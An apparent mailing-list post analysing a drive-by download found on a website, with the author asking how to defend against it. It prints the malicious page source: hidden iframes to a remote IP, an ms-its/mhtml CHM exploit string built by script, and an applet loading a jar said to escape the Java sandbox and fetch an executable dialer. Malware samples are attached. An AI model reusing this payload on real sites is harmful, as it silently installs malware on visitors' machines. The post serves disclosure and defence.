Hi People, before reading this, dont go on any of the sites unless you are sure ;) after decrypting some stuff, this is the source from: http://xxl-size.com/cogo.html ------------------------------------- <iframe src="http://209.8.20.130/dl/adv346.php"> <iframe src="http://www.awmcash.biz/adverts/14/1.htm"> ------------------------------------- this is the source from one of the iframes (http://209.8.20.130/dl/adv346.php): ---------------------------------------------------- <html><head> </head><body> <textarea id="cxw" style="display:none;"> <object data="${PR}" type="text/x-scriptlet"></object> </textarea> <script language="javascript"> document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm')); </script> <applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html> ---------------------------------------------------- the jar archive loaderadv346.jar contains some java classes which exploits the URLClassLoader bug (BlackBox.class). it overrides the sandbox and downloads a loadadv346.exe from: http://209.8.20.130/dl/loadadv346.exe this seems to be a dialer or something like this, it changes the hosts file, creates some spawn files, you can look for yourself, i included the file and the java stuff, the loadadv is upx'd, so far, anyone knows how to protect from this crap? you're welcome to send some solutions ;) cya, Stefan
Attachment:
loaderadv.zip
Description: Zip compressed data